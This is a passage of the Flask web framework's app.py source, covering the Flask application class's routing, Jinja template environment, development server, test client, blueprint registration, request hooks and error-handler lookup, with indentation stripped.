#: the request, and their return values are ignored. If an exception
#: occurred while processing the request, it gets passed to each
#: teardown_request function. To register a function here, use the
#: :meth:`teardown_request` decorator.
#:
#: .. versionadded:: 0.7
self.teardown_request_funcs = {}
#: A list of functions that are called when the application context
#: is destroyed. Since the application context is also torn down
#: if the request ends this is the place to store code that disconnects
#: from databases.
#:
#: .. versionadded:: 0.9
self.teardown_appcontext_funcs = []
#: A dictionary with lists of functions that are called before the
#: :attr:`before_request_funcs` functions. The key of the dictionary is
#: the name of the blueprint this function is active for, or ``None``
#: for all requests. To register a function, use
#: :meth:`url_value_preprocessor`.
#:
#: .. versionadded:: 0.7
self.url_value_preprocessors = {}
#: A dictionary with lists of functions that can be used as URL value
#: preprocessors. The key ``None`` here is used for application wide
#: callbacks, otherwise the key is the name of the blueprint.
#: Each of these functions has the chance to modify the dictionary
#: of URL values before they are used as the keyword arguments of the
#: view function. For each function registered this one should also
#: provide a :meth:`url_defaults` function that adds the parameters
#: automatically again that were removed that way.
#:
#: .. versionadded:: 0.7
self.url_default_functions = {}
#: A dictionary with list of functions that are called without argument
#: to populate the template context. The key of the dictionary is the
#: name of the blueprint this function is active for, ``None`` for all
#: requests. Each returns a dictionary that the template context is
#: updated with. To register a function here, use the
#: :meth:`context_processor` decorator.
self.template_context_processors = {
None: [_default_template_ctx_processor]
}
#: A list of shell context processor functions that should be run
#: when a shell context is created.
#:
#: .. versionadded:: 0.11
self.shell_context_processors = []
#: all the attached blueprints in a dictionary by name. Blueprints
#: can be attached multiple times so this dictionary does not tell
#: you how often they got attached.
#:
#: .. versionadded:: 0.7
self.blueprints = {}
self._blueprint_order = []
#: a place where extensions can store application specific state. For
#: example this is where an extension could store database engines and
#: similar things. For backwards compatibility extensions should register
#: themselves like this::
#:
#: if not hasattr(app, 'extensions'):
#: app.extensions = {}
#: app.extensions['extensionname'] = SomeObject()
#:
#: The key must match the name of the extension module. For example in
#: case of a "Flask-Foo" extension in `flask_foo`, the key would be
#: ``'foo'``.
#:
#: .. versionadded:: 0.7
self.extensions = {}
#: The :class:`~werkzeug.routing.Map` for this instance. You can use
#: this to change the routing converters after the class was created
#: but before any routes are connected. Example::
#:
#: from werkzeug.routing import BaseConverter
#:
#: class ListConverter(BaseConverter):
#: def to_python(self, value):
#: return value.split(',')
#: def to_url(self, values):
#: return ','.join(super(ListConverter, self).to_url(value)
#: for value in values)
#:
#: app = Flask(__name__)
#: app.url_map.converters['list'] = ListConverter
self.url_map = Map()
self.url_map.host_matching = host_matching
self.subdomain_matching = subdomain_matching
# tracks internally if the application already handled at least one
# request.
self._got_first_request = False
self._before_request_lock = Lock()
# Add a static route using the provided static_url_path, static_host,
# and static_folder if there is a configured static_folder.
# Note we do this without checking if static_folder exists.
# For one, it might be created while the server is running (e.g. during
# development). Also, Google App Engine stores static files somewhere
if self.has_static_folder:
assert bool(static_host) == host_matching, 'Invalid static_host/host_matching combination'
self.add_url_rule(
self.static_url_path + '/<path:filename>',
endpoint='static',
host=static_host,
view_func=self.send_static_file
)
#: The click command line context for this application. Commands
#: registered here show up in the :command:`flask` command once the
#: application has been discovered. The default commands are
#: provided by Flask itself and can be overridden.
#:
#: This is an instance of a :class:`click.Group` object.
self.cli = cli.AppGroup(self.name)
@locked_cached_property
def name(self):
"""The name of the application. This is usually the import name
with the difference that it's guessed from the run file if the
import name is main. This name is used as a display name when
Flask needs the name of the application. It can be set and overridden
to change the value.
.. versionadded:: 0.8
"""
if self.import_name == '__main__':
fn = getattr(sys.modules['__main__'], '__file__', None)
if fn is None:
return '__main__'
return os.path.splitext(os.path.basename(fn))[0]
return self.import_name
@property
def propagate_exceptions(self):
"""Returns the value of the ``PROPAGATE_EXCEPTIONS`` configuration
value in case it's set, otherwise a sensible default is returned.
.. versionadded:: 0.7
"""
rv = self.config['PROPAGATE_EXCEPTIONS']
if rv is not None:
return rv
return self.testing or self.debug
@property
def preserve_context_on_exception(self):
"""Returns the value of the ``PRESERVE_CONTEXT_ON_EXCEPTION``
configuration value in case it's set, otherwise a sensible default
is returned.
.. versionadded:: 0.7
"""
rv = self.config['PRESERVE_CONTEXT_ON_EXCEPTION']
if rv is not None:
return rv
return self.debug
@locked_cached_property
def logger(self):
"""The ``'flask.app'`` logger, a standard Python
:class:`~logging.Logger`.
In debug mode, the logger's :attr:`~logging.Logger.level` will be set
to :data:`~logging.DEBUG`.
If there are no handlers configured, a default handler will be added.
See :ref:`logging` for more information.
.. versionchanged:: 1.0
Behavior was simplified. The logger is always named
``flask.app``. The level is only set during configuration, it
doesn't check ``app.debug`` each time. Only one format is used,
not different ones depending on ``app.debug``. No handlers are
removed, and a handler is only added if no handlers are already
configured.
.. versionadded:: 0.3
"""
return create_logger(self)
@locked_cached_property
def jinja_env(self):
"""The Jinja2 environment used to load templates."""
return self.create_jinja_environment()
@property
def got_first_request(self):
"""This attribute is set to ``True`` if the application started
handling the first request.
.. versionadded:: 0.8
"""
return self._got_first_request
def make_config(self, instance_relative=False):
"""Used to create the config attribute by the Flask constructor.
The `instance_relative` parameter is passed in from the constructor
of Flask (there named `instance_relative_config`) and indicates if
the config should be relative to the instance path or the root path
of the application.
.. versionadded:: 0.8
"""
root_path = self.root_path
if instance_relative:
root_path = self.instance_path
defaults = dict(self.default_config)
defaults['ENV'] = get_env()
defaults['DEBUG'] = get_debug_flag()
return self.config_class(root_path, defaults)
def auto_find_instance_path(self):
"""Tries to locate the instance path if it was not provided to the
constructor of the application class. It will basically calculate
the path to a folder named ``instance`` next to your main file or
the package.
.. versionadded:: 0.8
"""
prefix, package_path = find_package(self.import_name)
if prefix is None:
return os.path.join(package_path, 'instance')
return os.path.join(prefix, 'var', self.name + '-instance')
def open_instance_resource(self, resource, mode='rb'):
"""Opens a resource from the application's instance folder
(:attr:`instance_path`). Otherwise works like
:meth:`open_resource`. Instance resources can also be opened for
writing.
:param resource: the name of the resource. To access resources within
subfolders use forward slashes as separator.
:param mode: resource file opening mode, default is 'rb'.
"""
return open(os.path.join(self.instance_path, resource), mode)
def _get_templates_auto_reload(self):
"""Reload templates when they are changed. Used by
:meth:`create_jinja_environment`.
This attribute can be configured with :data:`TEMPLATES_AUTO_RELOAD`. If
not set, it will be enabled in debug mode.
.. versionadded:: 1.0
This property was added but the underlying config and behavior
already existed.
"""
rv = self.config['TEMPLATES_AUTO_RELOAD']
return rv if rv is not None else self.debug
def _set_templates_auto_reload(self, value):
self.config['TEMPLATES_AUTO_RELOAD'] = value
templates_auto_reload = property(
_get_templates_auto_reload, _set_templates_auto_reload
)
del _get_templates_auto_reload, _set_templates_auto_reload
def create_jinja_environment(self):
"""Creates the Jinja2 environment based on :attr:`jinja_options`
and :meth:`select_jinja_autoescape`. Since 0.7 this also adds
the Jinja2 globals and filters after initialization. Override
this function to customize the behavior.
.. versionadded:: 0.5
.. versionchanged:: 0.11
``Environment.auto_reload`` set in accordance with
``TEMPLATES_AUTO_RELOAD`` configuration option.
"""
options = dict(self.jinja_options)
if 'autoescape' not in options:
options['autoescape'] = self.select_jinja_autoescape
if 'auto_reload' not in options:
options['auto_reload'] = self.templates_auto_reload
rv = self.jinja_environment(self, **options)
rv.globals.update(
url_for=url_for,
get_flashed_messages=get_flashed_messages,
config=self.config,
# request, session and g are normally added with the
# context processor for efficiency reasons but for imported
# templates we also want the proxies in there.
request=request,
session=session,
g=g
)
rv.filters['tojson'] = json.tojson_filter
return rv
def create_global_jinja_loader(self):
"""Creates the loader for the Jinja2 environment. Can be used to
override just the loader and keeping the rest unchanged. It's
discouraged to override this function. Instead one should override
the :meth:`jinja_loader` function instead.
The global loader dispatches between the loaders of the application
and the individual blueprints.
.. versionadded:: 0.7
"""
return DispatchingJinjaLoader(self)
def select_jinja_autoescape(self, filename):
"""Returns ``True`` if autoescaping should be active for the given
template name. If no template name is given, returns `True`.
.. versionadded:: 0.5
"""
if filename is None:
return True
return filename.endswith(('.html', '.htm', '.xml', '.xhtml'))
def update_template_context(self, context):
"""Update the template context with some commonly used variables.
This injects request, session, config and g into the template
context as well as everything template context processors want
to inject. Note that the as of Flask 0.6, the original values
in the context will not be overridden if a context processor
decides to return a value with the same key.
:param context: the context as a dictionary that is updated in place
to add extra variables.
"""
funcs = self.template_context_processors[None]
reqctx = _request_ctx_stack.top
if reqctx is not None:
bp = reqctx.request.blueprint
if bp is not None and bp in self.template_context_processors:
funcs = chain(funcs, self.template_context_processors[bp])
orig_ctx = context.copy()
for func in funcs:
context.update(func())
# make sure the original values win. This makes it possible to
# easier add new variables in context processors without breaking
# existing views.
context.update(orig_ctx)
def make_shell_context(self):
"""Returns the shell context for an interactive shell for this
application. This runs all the registered shell context
processors.
.. versionadded:: 0.11
"""
rv = {'app': self, 'g': g}
for processor in self.shell_context_processors:
rv.update(processor())
return rv
#: What environment the app is running in. Flask and extensions may
#: enable behaviors based on the environment, such as enabling debug
#: mode. This maps to the :data:`ENV` config key. This is set by the
#: :envvar:`FLASK_ENV` environment variable and may not behave as
#: expected if set in code.
#:
#: **Do not enable development when deploying in production.**
#:
#: Default: ``'production'``
env = ConfigAttribute('ENV')
def _get_debug(self):
return self.config['DEBUG']
def _set_debug(self, value):
self.config['DEBUG'] = value
self.jinja_env.auto_reload = self.templates_auto_reload
#: Whether debug mode is enabled. When using ``flask run`` to start
#: the development server, an interactive debugger will be shown for
#: unhandled exceptions, and the server will be reloaded when code
#: changes. This maps to the :data:`DEBUG` config key. This is
#: enabled when :attr:`env` is ``'development'`` and is overridden
#: by the ``FLASK_DEBUG`` environment variable. It may not behave as
#: expected if set in code.
#:
#: **Do not enable debug mode when deploying in production.**
#:
#: Default: ``True`` if :attr:`env` is ``'development'``, or
#: ``False`` otherwise.
debug = property(_get_debug, _set_debug)
del _get_debug, _set_debug
def run(self, host=None, port=None, debug=None,
load_dotenv=True, **options):
"""Runs the application on a local development server.
Do not use ``run()`` in a production setting. It is not intended to
meet security and performance requirements for a production server.
Instead, see :ref:`deployment` for WSGI server recommendations.
If the :attr:`debug` flag is set the server will automatically reload
for code changes and show a debugger in case an exception happened.
If you want to run the application in debug mode, but disable the
code execution on the interactive debugger, you can pass
``use_evalex=False`` as parameter. This will keep the debugger's
traceback screen active, but disable code execution.
It is not recommended to use this function for development with
automatic reloading as this is badly supported. Instead you should
be using the :command:`flask` command line script's ``run`` support.
.. admonition:: Keep in Mind
Flask will suppress any server error with a generic error page
unless it is in debug mode. As such to enable just the
interactive debugger without the code reloading, you have to
invoke :meth:`run` with ``debug=True`` and ``use_reloader=False``.
Setting ``use_debugger`` to ``True`` without being in debug mode
won't catch any exceptions because there won't be any to
catch.
:param host: the hostname to listen on. Set this to ``'0.0.0.0'`` to
have the server available externally as well. Defaults to
``'127.0.0.1'`` or the host in the ``SERVER_NAME`` config variable
if present.
:param port: the port of the webserver. Defaults to ``5000`` or the
port defined in the ``SERVER_NAME`` config variable if present.
:param debug: if given, enable or disable debug mode. See
:attr:`debug`.
:param load_dotenv: Load the nearest :file:`.env` and :file:`.flaskenv`
files to set environment variables. Will also change the working
directory to the directory containing the first file found.
:param options: the options to be forwarded to the underlying Werkzeug
server. See :func:`werkzeug.serving.run_simple` for more
information.
.. versionchanged:: 1.0
If installed, python-dotenv will be used to load environment
variables from :file:`.env` and :file:`.flaskenv` files.
If set, the :envvar:`FLASK_ENV` and :envvar:`FLASK_DEBUG`
environment variables will override :attr:`env` and
:attr:`debug`.
Threaded mode is enabled by default.
.. versionchanged:: 0.10
The default port is now picked from the ``SERVER_NAME``
variable.
"""
# Change this into a no-op if the server is invoked from the
# command line. Have a look at cli.py for more information.
if os.environ.get('FLASK_RUN_FROM_CLI') == 'true':
from .debughelpers import explain_ignored_app_run
explain_ignored_app_run()
return
if get_load_dotenv(load_dotenv):
cli.load_dotenv()
# if set, let env vars override previous values
if 'FLASK_ENV' in os.environ:
self.env = get_env()
self.debug = get_debug_flag()
elif 'FLASK_DEBUG' in os.environ:
self.debug = get_debug_flag()
# debug passed to method overrides all other sources
if debug is not None:
self.debug = bool(debug)
_host = '127.0.0.1'
_port = 5000
server_name = self.config.get('SERVER_NAME')
sn_host, sn_port = None, None
if server_name:
sn_host, _, sn_port = server_name.partition(':')
host = host or sn_host or _host
port = int(port or sn_port or _port)
options.setdefault('use_reloader', self.debug)
options.setdefault('use_debugger', self.debug)
options.setdefault('threaded', True)
cli.show_server_banner(self.env, self.debug, self.name, False)
from werkzeug.serving import run_simple
try:
run_simple(host, port, self, **options)
finally:
# reset the first request information if the development server
# reset normally. This makes it possible to restart the server
# without reloader and that stuff from an interactive shell.
self._got_first_request = False
def test_client(self, use_cookies=True, **kwargs):
"""Creates a test client for this application. For information
about unit testing head over to :ref:`testing`.
Note that if you are testing for assertions or exceptions in your
application code, you must set ``app.testing = True`` in order for the
exceptions to propagate to the test client. Otherwise, the exception
will be handled by the application (not visible to the test client) and
the only indication of an AssertionError or other exception will be a
500 status code response to the test client. See the :attr:`testing`
attribute. For example::
app.testing = True
client = app.test_client()
The test client can be used in a ``with`` block to defer the closing down
of the context until the end of the ``with`` block. This is useful if
you want to access the context locals for testing::
with app.test_client() as c:
rv = c.get('/?vodka=42')
assert request.args['vodka'] == '42'
Additionally, you may pass optional keyword arguments that will then
be passed to the application's :attr:`test_client_class` constructor.
For example::
from flask.testing import FlaskClient
class CustomClient(FlaskClient):
def __init__(self, *args, **kwargs):
self._authentication = kwargs.pop("authentication")
super(CustomClient,self).__init__( *args, **kwargs)
app.test_client_class = CustomClient
client = app.test_client(authentication='Basic ....')
See :class:`~flask.testing.FlaskClient` for more information.
.. versionchanged:: 0.4
added support for ``with`` block usage for the client.
.. versionadded:: 0.7
The `use_cookies` parameter was added as well as the ability
to override the client to be used by setting the
:attr:`test_client_class` attribute.
.. versionchanged:: 0.11
Added `**kwargs` to support passing additional keyword arguments to
the constructor of :attr:`test_client_class`.
"""
cls = self.test_client_class
if cls is None:
from flask.testing import FlaskClient as cls
return cls(self, self.response_class, use_cookies=use_cookies, **kwargs)
def test_cli_runner(self, **kwargs):
"""Create a CLI runner for testing CLI commands.
See :ref:`testing-cli`.
Returns an instance of :attr:`test_cli_runner_class`, by default
:class:`~flask.testing.FlaskCliRunner`. The Flask app object is
passed as the first argument.
.. versionadded:: 1.0
"""
cls = self.test_cli_runner_class
if cls is None:
from flask.testing import FlaskCliRunner as cls
return cls(self, **kwargs)
def open_session(self, request):
"""Creates or opens a new session. Default implementation stores all
session data in a signed cookie. This requires that the
:attr:`secret_key` is set. Instead of overriding this method
we recommend replacing the :class:`session_interface`.
.. deprecated: 1.0
Will be removed in 1.1. Use ``session_interface.open_session``
instead.
:param request: an instance of :attr:`request_class`.
"""
warnings.warn(DeprecationWarning(
'"open_session" is deprecated and will be removed in 1.1. Use'
' "session_interface.open_session" instead.'
))
return self.session_interface.open_session(self, request)
def save_session(self, session, response):
"""Saves the session if it needs updates. For the default
implementation, check :meth:`open_session`. Instead of overriding this
method we recommend replacing the :class:`session_interface`.
.. deprecated: 1.0
Will be removed in 1.1. Use ``session_interface.save_session``
instead.
:param session: the session to be saved (a
:class:`~werkzeug.contrib.securecookie.SecureCookie`
object)
:param response: an instance of :attr:`response_class`
"""
warnings.warn(DeprecationWarning(
'"save_session" is deprecated and will be removed in 1.1. Use'
' "session_interface.save_session" instead.'
))
return self.session_interface.save_session(self, session, response)
def make_null_session(self):
"""Creates a new instance of a missing session. Instead of overriding
this method we recommend replacing the :class:`session_interface`.
.. deprecated: 1.0
Will be removed in 1.1. Use ``session_interface.make_null_session``
instead.
.. versionadded:: 0.7
"""
warnings.warn(DeprecationWarning(
'"make_null_session" is deprecated and will be removed in 1.1. Use'
' "session_interface.make_null_session" instead.'
))
return self.session_interface.make_null_session(self)
@setupmethod
def register_blueprint(self, blueprint, **options):
"""Register a :class:`~flask.Blueprint` on the application. Keyword
arguments passed to this method will override the defaults set on the
blueprint.
Calls the blueprint's :meth:`~flask.Blueprint.register` method after
recording the blueprint in the application's :attr:`blueprints`.
:param blueprint: The blueprint to register.
:param url_prefix: Blueprint routes will be prefixed with this.
:param subdomain: Blueprint routes will match on this subdomain.
:param url_defaults: Blueprint routes will use these default values for
view arguments.
:param options: Additional keyword arguments are passed to
:class:`~flask.blueprints.BlueprintSetupState`. They can be
accessed in :meth:`~flask.Blueprint.record` callbacks.
.. versionadded:: 0.7
"""
first_registration = False
if blueprint.name in self.blueprints:
assert self.blueprints[blueprint.name] is blueprint, (
'A name collision occurred between blueprints %r and %r. Both'
' share the same name "%s". Blueprints that are created on the'
' fly need unique names.' % (
blueprint, self.blueprints[blueprint.name], blueprint.name
)
)
else:
self.blueprints[blueprint.name] = blueprint
self._blueprint_order.append(blueprint)
first_registration = True
blueprint.register(self, options, first_registration)
def iter_blueprints(self):
"""Iterates over all blueprints by the order they were registered.
.. versionadded:: 0.11
"""
return iter(self._blueprint_order)
@setupmethod
def add_url_rule(self, rule, endpoint=None, view_func=None,
provide_automatic_options=None, **options):
"""Connects a URL rule. Works exactly like the :meth:`route`
decorator. If a view_func is provided it will be registered with the
endpoint.
Basically this example::
@app.route('/')
def index():
pass
Is equivalent to the following::
def index():
pass
app.add_url_rule('/', 'index', index)
If the view_func is not provided you will need to connect the endpoint
to a view function like so::
app.view_functions['index'] = index
Internally :meth:`route` invokes :meth:`add_url_rule` so if you want
to customize the behavior via subclassing you only need to change
this method.
For more information refer to :ref:`url-route-registrations`.
.. versionchanged:: 0.2
`view_func` parameter added.
.. versionchanged:: 0.6
``OPTIONS`` is added automatically as method.
:param rule: the URL rule as string
:param endpoint: the endpoint for the registered URL rule. Flask
itself assumes the name of the view function as
endpoint
:param view_func: the function to call when serving a request to the
provided endpoint
:param provide_automatic_options: controls whether the ``OPTIONS``
method should be added automatically. This can also be controlled
by setting the ``view_func.provide_automatic_options = False``
before adding the rule.
:param options: the options to be forwarded to the underlying
:class:`~werkzeug.routing.Rule` object. A change
to Werkzeug is handling of method options. methods
is a list of methods this rule should be limited
to (``GET``, ``POST`` etc.). By default a rule
just listens for ``GET`` (and implicitly ``HEAD``).
Starting with Flask 0.6, ``OPTIONS`` is implicitly
added and handled by the standard request handling.
"""
if endpoint is None:
endpoint = _endpoint_from_view_func(view_func)
options['endpoint'] = endpoint
methods = options.pop('methods', None)
# if the methods are not given and the view_func object knows its
# methods we can use that instead. If neither exists, we go with
# a tuple of only ``GET`` as default.
if methods is None:
methods = getattr(view_func, 'methods', None) or ('GET',)
if isinstance(methods, string_types):
raise TypeError('Allowed methods have to be iterables of strings, '
'for example: @app.route(..., methods=["POST"])')
methods = set(item.upper() for item in methods)
# Methods that should always be added
required_methods = set(getattr(view_func, 'required_methods', ()))
# starting with Flask 0.8 the view_func object can disable and
# force-enable the automatic options handling.
if provide_automatic_options is None:
provide_automatic_options = getattr(view_func,
'provide_automatic_options', None)
if provide_automatic_options is None:
if 'OPTIONS' not in methods:
provide_automatic_options = True
required_methods.add('OPTIONS')
else:
provide_automatic_options = False
# Add the required methods now.
methods |= required_methods
rule = self.url_rule_class(rule, methods=methods, **options)
rule.provide_automatic_options = provide_automatic_options
self.url_map.add(rule)
if view_func is not None:
old_func = self.view_functions.get(endpoint)
if old_func is not None and old_func != view_func:
raise AssertionError('View function mapping is overwriting an '
'existing endpoint function: %s' % endpoint)
self.view_functions[endpoint] = view_func
def route(self, rule, **options):
"""A decorator that is used to register a view function for a
given URL rule. This does the same thing as :meth:`add_url_rule`
but is intended for decorator usage::
@app.route('/')
def index():
return 'Hello World'
For more information refer to :ref:`url-route-registrations`.
:param rule: the URL rule as string
:param endpoint: the endpoint for the registered URL rule. Flask
itself assumes the name of the view function as
endpoint
:param options: the options to be forwarded to the underlying
:class:`~werkzeug.routing.Rule` object. A change
to Werkzeug is handling of method options. methods
is a list of methods this rule should be limited
to (``GET``, ``POST`` etc.). By default a rule
just listens for ``GET`` (and implicitly ``HEAD``).
Starting with Flask 0.6, ``OPTIONS`` is implicitly
added and handled by the standard request handling.
"""
def decorator(f):
endpoint = options.pop('endpoint', None)
self.add_url_rule(rule, endpoint, f, **options)
return f
return decorator
@setupmethod
def endpoint(self, endpoint):
"""A decorator to register a function as an endpoint.
Example::
@app.endpoint('example.endpoint')
def example():
return "example"
:param endpoint: the name of the endpoint
"""
def decorator(f):
self.view_functions[endpoint] = f
return f
return decorator
@staticmethod
def _get_exc_class_and_code(exc_class_or_code):
"""Ensure that we register only exceptions as handler keys"""
if isinstance(exc_class_or_code, integer_types):
exc_class = default_exceptions[exc_class_or_code]
else:
exc_class = exc_class_or_code
assert issubclass(exc_class, Exception)
if issubclass(exc_class, HTTPException):
return exc_class, exc_class.code
else:
return exc_class, None
@setupmethod
def errorhandler(self, code_or_exception):
"""Register a function to handle errors by code or exception class.
A decorator that is used to register a function given an
error code. Example::
@app.errorhandler(404)
def page_not_found(error):
return 'This page does not exist', 404
You can also register handlers for arbitrary exceptions::
@app.errorhandler(DatabaseError)
def special_exception_handler(error):
return 'Database connection failed', 500
.. versionadded:: 0.7
Use :meth:`register_error_handler` instead of modifying
:attr:`error_handler_spec` directly, for application wide error
handlers.
.. versionadded:: 0.7
One can now additionally also register custom exception types
that do not necessarily have to be a subclass of the
:class:`~werkzeug.exceptions.HTTPException` class.
:param code_or_exception: the code as integer for the handler, or
an arbitrary exception
"""
def decorator(f):
self._register_error_handler(None, code_or_exception, f)
return f
return decorator
@setupmethod
def register_error_handler(self, code_or_exception, f):
"""Alternative error attach function to the :meth:`errorhandler`
decorator that is more straightforward to use for non decorator
usage.
.. versionadded:: 0.7
"""
self._register_error_handler(None, code_or_exception, f)
@setupmethod
def _register_error_handler(self, key, code_or_exception, f):
"""
:type key: None|str
:type code_or_exception: int|T<=Exception
:type f: callable
"""
if isinstance(code_or_exception, HTTPException): # old broken behavior
raise ValueError(
'Tried to register a handler for an exception instance {0!r}.'
' Handlers can only be registered for exception classes or'
' HTTP error codes.'.format(code_or_exception)
)
try:
exc_class, code = self._get_exc_class_and_code(code_or_exception)
except KeyError:
raise KeyError(
"'{0}' is not a recognized HTTP error code. Use a subclass of"
" HTTPException with that code instead.".format(code_or_exception)
)
handlers = self.error_handler_spec.setdefault(key, {}).setdefault(code, {})
handlers[exc_class] = f
@setupmethod
def template_filter(self, name=None):
"""A decorator that is used to register custom template filter.
You can specify a name for the filter, otherwise the function
name will be used. Example::
@app.template_filter()
def reverse(s):
return s[::-1]
:param name: the optional name of the filter, otherwise the
function name will be used.
"""
def decorator(f):
self.add_template_filter(f, name=name)
return f
return decorator
@setupmethod
def add_template_filter(self, f, name=None):
"""Register a custom template filter. Works exactly like the
:meth:`template_filter` decorator.
:param name: the optional name of the filter, otherwise the
function name will be used.
"""
self.jinja_env.filters[name or f.__name__] = f
@setupmethod
def template_test(self, name=None):
"""A decorator that is used to register custom template test.
You can specify a name for the test, otherwise the function
name will be used. Example::
@app.template_test()
def is_prime(n):
if n == 2:
return True
for i in range(2, int(math.ceil(math.sqrt(n))) + 1):
if n % i == 0:
return False
return True
.. versionadded:: 0.10
:param name: the optional name of the test, otherwise the
function name will be used.
"""
def decorator(f):
self.add_template_test(f, name=name)
return f
return decorator
@setupmethod
def add_template_test(self, f, name=None):
"""Register a custom template test. Works exactly like the
:meth:`template_test` decorator.
.. versionadded:: 0.10
:param name: the optional name of the test, otherwise the
function name will be used.
"""
self.jinja_env.tests[name or f.__name__] = f
@setupmethod
def template_global(self, name=None):
"""A decorator that is used to register a custom template global function.
You can specify a name for the global function, otherwise the function
name will be used. Example::
@app.template_global()
def double(n):
return 2 * n
.. versionadded:: 0.10
:param name: the optional name of the global function, otherwise the
function name will be used.
"""
def decorator(f):
self.add_template_global(f, name=name)
return f
return decorator
@setupmethod
def add_template_global(self, f, name=None):
"""Register a custom template global function. Works exactly like the
:meth:`template_global` decorator.
.. versionadded:: 0.10
:param name: the optional name of the global function, otherwise the
function name will be used.
"""
self.jinja_env.globals[name or f.__name__] = f
@setupmethod
def before_request(self, f):
"""Registers a function to run before each request.
For example, this can be used to open a database connection, or to load
the logged in user from the session.
The function will be called without any arguments. If it returns a
non-None value, the value is handled as if it was the return value from
the view, and further request handling is stopped.
"""
self.before_request_funcs.setdefault(None, []).append(f)
return f
@setupmethod
def before_first_request(self, f):
"""Registers a function to be run before the first request to this
instance of the application.
The function will be called without any arguments and its return
value is ignored.
.. versionadded:: 0.8
"""
self.before_first_request_funcs.append(f)
return f
@setupmethod
def after_request(self, f):
"""Register a function to be run after each request.
Your function must take one parameter, an instance of
:attr:`response_class` and return a new response object or the
same (see :meth:`process_response`).
As of Flask 0.7 this function might not be executed at the end of the
request in case an unhandled exception occurred.
"""
self.after_request_funcs.setdefault(None, []).append(f)
return f
@setupmethod
def teardown_request(self, f):
"""Register a function to be run at the end of each request,
regardless of whether there was an exception or not. These functions
are executed when the request context is popped, even if not an
actual request was performed.
Example::
ctx = app.test_request_context()
ctx.push()
...
ctx.pop()
When ``ctx.pop()`` is executed in the above example, the teardown
functions are called just before the request context moves from the
stack of active contexts. This becomes relevant if you are using
such constructs in tests.
Generally teardown functions must take every necessary step to avoid
that they will fail. If they do execute code that might fail they
will have to surround the execution of these code by try/except
statements and log occurring errors.
When a teardown function was called because of an exception it will
be passed an error object.
The return values of teardown functions are ignored.
.. admonition:: Debug Note
In debug mode Flask will not tear down a request on an exception
immediately. Instead it will keep it alive so that the interactive
debugger can still access it. This behavior can be controlled
by the ``PRESERVE_CONTEXT_ON_EXCEPTION`` configuration variable.
"""
self.teardown_request_funcs.setdefault(None, []).append(f)
return f
@setupmethod
def teardown_appcontext(self, f):
"""Registers a function to be called when the application context
ends. These functions are typically also called when the request
context is popped.
Example::
ctx = app.app_context()
ctx.push()
...
ctx.pop()
When ``ctx.pop()`` is executed in the above example, the teardown
functions are called just before the app context moves from the
stack of active contexts. This becomes relevant if you are using
such constructs in tests.
Since a request context typically also manages an application
context it would also be called when you pop a request context.
When a teardown function was called because of an unhandled exception
it will be passed an error object. If an :meth:`errorhandler` is
registered, it will handle the exception and the teardown will not
receive it.
The return values of teardown functions are ignored.
.. versionadded:: 0.9
"""
self.teardown_appcontext_funcs.append(f)
return f
@setupmethod
def context_processor(self, f):
"""Registers a template context processor function."""
self.template_context_processors[None].append(f)
return f
@setupmethod
def shell_context_processor(self, f):
"""Registers a shell context processor function.
.. versionadded:: 0.11
"""
self.shell_context_processors.append(f)
return f
@setupmethod
def url_value_preprocessor(self, f):
"""Register a URL value preprocessor function for all view
functions in the application. These functions will be called before the
:meth:`before_request` functions.
The function can modify the values captured from the matched url before
they are passed to the view. For example, this can be used to pop a
common language code value and place it in ``g`` rather than pass it to
every view.
The function is passed the endpoint name and values dict. The return
value is ignored.
"""
self.url_value_preprocessors.setdefault(None, []).append(f)
return f
@setupmethod
def url_defaults(self, f):
"""Callback function for URL defaults for all view functions of the
application. It's called with the endpoint and values and should
update the values passed in place.
"""
self.url_default_functions.setdefault(None, []).append(f)
return f
def _find_error_handler(self, e):
"""Return a registered error handler for an exception in this order:
blueprint handler for a specific code, app handler for a specific code,
blueprint handler for an exception class, app handler for an exception
class, or ``None`` if a suitable handler is not found.
"""
exc_class, code = self._get_exc_class_and_code(type(e))
for name, c in (
(request.blueprint, code), (None, code),
(request.blueprint, None), (None, None)
):
handler_map = self.error_handler_spec.setdefault(name, {}).get(c)
if not handler_map:
continue
for cls in exc_class.__mro__:
handler = handler_map.get(cls)
if handler is not None:
return handler
def handle_http_exception(self, e):
"""Handles an HTTP exception. By default this will invoke the
registered error handlers and fall back to returning the
exception as response.
.. versionchanged:: 1.0.3
``RoutingException``, used internally for actions such as
slash redirects during routing, is not passed to error
handlers.
.. versionchanged:: 1.0
Exceptions are looked up by code *and* by MRO, so
``HTTPExcpetion`` subclasses can be handled with a catch-all
handler for the base ``HTTPException``.
.. versionadded:: 0.3
"""
# Proxy exceptions don't have error codes. We want to always return
# those unchanged as errors
if e.code is None:
return e
# RoutingExceptions are used internally to trigger routing
# actions, such as slash redirects raising RequestRedirect. They
# are not raised or handled in user code.
if isinstance(e, RoutingException):
return e
handler = self._find_error_handler(e)
if handler is None:
return e
return handler(e)
def trap_http_exception(self, e):
"""Checks if an HTTP exception should be trapped or not. By default
this will return ``False`` for all exceptions except for a bad request
key error if ``TRAP_BAD_REQUEST_ERRORS`` is set to ``True``. It
also returns ``True`` if ``TRAP_HTTP_EXCEPTIONS`` is set to ``True``.
This is called for all HTTP exceptions raised by a view function.
If it returns ``True`` for any exception the error handler for this
exception is not called and it shows up as regular exception in the
traceback. This is helpful for debugging implicitly raised HTTP
exceptions.
.. versionchanged:: 1.0
Bad request errors are not trapped by default in debug mode.
.. versionadded:: 0.8
"""
if self.config['TRAP_HTTP_EXCEPTIONS']:
return True
trap_bad_request = self.config['TRAP_BAD_REQUEST_ERRORS']
# if unset, trap key errors in debug mode
if (
trap_bad_request is None and self.debug
and isinstance(e, BadRequestKeyError)
):
return True
if trap_bad_request:
return isinstance(e, BadRequest)
return False
def handle_user_exception(self, e):
"""This method is called whenever an exception occurs that
should be handled. A special case is :class:`~werkzeug
.exceptions.HTTPException` which is forwarded to the
:meth:`handle_http_exception` method. This function will either
return a response value or reraise the exception with the same
traceback.
.. versionchanged:: 1.0
Key errors raised from request data like ``form`` show the
bad key in debug mode rather than a generic bad request
message.
.. versionadded:: 0.7
"""
exc_type, exc_value, tb = sys.exc_info()
assert exc_value is e
# ensure not to trash sys.exc_info() at that point in case someone
# wants the traceback preserved in handle_http_exception. Of course
# we cannot prevent users from trashing it themselves in a custom
# trap_http_exception method so that's their fault then.
if isinstance(e, BadRequestKeyError):
if self.debug or self.config["TRAP_BAD_REQUEST_ERRORS"]:
# Werkzeug < 0.15 doesn't add the KeyError to the 400
# message, add it in manually.
description = e.get_description()
